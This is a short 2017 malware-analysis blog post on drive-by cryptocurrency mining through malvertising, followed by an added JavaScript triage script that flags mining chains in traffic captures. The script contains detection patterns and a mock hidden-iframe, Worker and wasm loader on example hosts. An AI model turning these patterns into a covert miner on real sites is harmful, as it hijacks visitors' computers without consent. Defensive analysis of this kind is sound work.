Wednesday, September 27, 2017

Looking into Drive-by Mining

First

Recently, ESET, Sucuri and Malwarebytes each released reports on browser-based cryptocurrency mining. Drive-by Download is not as active as before, but Drive-by Mining is on the rise. Drive-by Mining follows two patterns: compromised legitimate websites and Malvertising. I observed similar traffic in my traffic observation environment and noticed several campaigns, one of which is very interesting. This is a short report on it.

Traffic Analysis

The entry point is an ordinary website that loads advertisements, which is how the Malvertising comes in. On this website, the following code was loaded:



For "code[.]moviead55[.]ru", see the ESET report:
"Cryptocurrency web mining: In union there is profit"

However, it generated traffic that was slightly different from what the report describes.

The loaded code is lightly obfuscated. Once decoded, it generates an iframe after some processing.



This iframe loads an HTML page, which contained the following code:



Let's look at the JavaScript registered as a Worker:



This is the wasm file being loaded:
https://www.virustotal.com/#/file/1fd2bc9a5011ad82b543b51b8f800d47bc5d8229a01263de620f878088ff585a/detection

convert.js was very similar to code published on GitHub:
https://github.com/mtve/yazecminer

Finally, this is the traffic chain:

While the page was open, my CPU load was high.

Conclusion

Attackers always use the latest technology. I found many sites using coin-hive and similar services for Drive-by Mining. If your CPU load is high while visiting a website, mining is a possibility.
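The chain described above (ad script, obfuscated loader, hidden iframe, Worker, wasm) leaves artifacts that an analyst can triage from a traffic capture. The following is an added example, not code from the original post: it rebuilds the request chain from Referer headers and scores each fetched resource for mining indicators. The host list takes `code.moviead55.ru` and `coin-hive` from the post; the other markers (`new Worker(`, `WebAssembly.instantiate`, `navigator.hardwareConcurrency`, `atob`/`eval`, iframe creation), the weights, the threshold and the sample capture are all constructed assumptions for illustration.

```javascript
// Added example, not code from the original post. Heuristic triage of a
// captured drive-by mining chain: (1) rebuild the request chain from Referer
// headers, (2) score each fetched resource for mining indicators.
// Marker regexes and weights are assumptions, not a vetted signature set.

// Hosts the post names (defanged there as code[.]moviead55[.]ru and "coin-hive").
const KNOWN_MINER_HOSTS = ['code.moviead55.ru', 'coin-hive.com', 'coinhive.com'];

// Technique markers, weighted by how specific each is to in-browser mining.
const MARKERS = [
  { name: 'worker',        re: /new\s+Worker\s*\(/,                          weight: 2 },
  { name: 'wasm',          re: /WebAssembly\.(instantiate|compile)|\.wasm\b/, weight: 3 },
  { name: 'threads',       re: /navigator\.hardwareConcurrency/,              weight: 2 },
  { name: 'obfuscation',   re: /\b(eval|atob|unescape)\s*\(/,                 weight: 1 },
  { name: 'hidden-iframe', re: /createElement\s*\(\s*['"]iframe['"]\s*\)/,    weight: 1 },
];

function hostOf(url) {
  try { return new URL(url).hostname.toLowerCase(); } catch { return ''; }
}

// Score one resource: its host against known miner hosts, its body against markers.
function scoreResource({ url, body }) {
  const findings = [];
  let score = 0;
  const host = hostOf(url);
  if (KNOWN_MINER_HOSTS.some(h => host === h || host.endsWith('.' + h))) {
    findings.push('known-miner-host:' + host);
    score += 5;
  }
  for (const m of MARKERS) {
    if (m.re.test(body || '')) { findings.push(m.name); score += m.weight; }
  }
  return { url, score, findings };
}

// Rebuild the chain from Referer: entry pages are requests with no referer in
// the capture; children are the requests that name a URL as their referer.
function buildChain(requests) {
  const byReferer = new Map();
  for (const r of requests) {
    const key = r.referer || '';
    if (!byReferer.has(key)) byReferer.set(key, []);
    byReferer.get(key).push(r.url);
  }
  const chain = [];
  const seen = new Set();
  const walk = (url, depth) => {
    if (seen.has(url)) return;
    seen.add(url);
    chain.push({ depth, url });
    for (const child of byReferer.get(url) || []) walk(child, depth + 1);
  };
  for (const root of byReferer.get('') || []) walk(root, 0);
  return chain;
}

// Verdict: flagged when one resource reaches the threshold, or when the
// Worker and wasm markers appear anywhere in the same capture (the miner is
// usually split across a loader page, a worker script and a wasm module).
function triage(requests, threshold = 5) {
  const chain = buildChain(requests);
  const scored = requests.map(scoreResource);
  const all = new Set(scored.flatMap(s => s.findings));
  const flagged = scored.some(s => s.score >= threshold) ||
    (all.has('worker') && all.has('wasm'));
  return { chain, scored, flagged };
}

// Constructed sample capture (hypothetical hosts) mirroring the post's chain:
// publisher page -> ad script -> hidden iframe HTML -> worker JS -> wasm.
// Referers follow browser behaviour: the iframe's document refers to the parent
// page, and a fetch inside a Worker refers to the worker script URL.
const SAMPLE = [
  { url: 'https://publisher.example/article', referer: null,
    body: '<script src="https://ads.example/ad.js"></script>' },
  { url: 'https://ads.example/ad.js', referer: 'https://publisher.example/article',
    body: "var f=document.createElement('iframe');f.style.display='none';" +
          "f.src=atob('aHR0cHM6Ly9sb2FkZXIuZXhhbXBsZS9tLmh0bWw=');document.body.appendChild(f);" },
  { url: 'https://loader.example/m.html', referer: 'https://publisher.example/article',
    body: "<script>var n=navigator.hardwareConcurrency;for(var i=0;i<n;i++)new Worker('worker.js');</script>" },
  { url: 'https://loader.example/worker.js', referer: 'https://loader.example/m.html',
    body: "fetch('miner.wasm').then(r=>r.arrayBuffer()).then(b=>WebAssembly.instantiate(b,{}));" },
  { url: 'https://loader.example/miner.wasm', referer: 'https://loader.example/worker.js', body: '' },
];

const RESULT = triage(SAMPLE);
for (const step of RESULT.chain) console.log('  '.repeat(step.depth) + step.url);
for (const s of RESULT.scored) {
  if (s.findings.length) console.log(s.url, 'score=' + s.score, s.findings.join(','));
}
console.log('flagged:', RESULT.flagged);
```

No single resource in the sample crosses the threshold; the capture is flagged because the Worker and wasm markers together show the pattern the post describes, which is why the verdict looks across the whole chain rather than at one file. Run it under Node with a real capture by replacing `SAMPLE` with the URL, Referer and body of each request.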



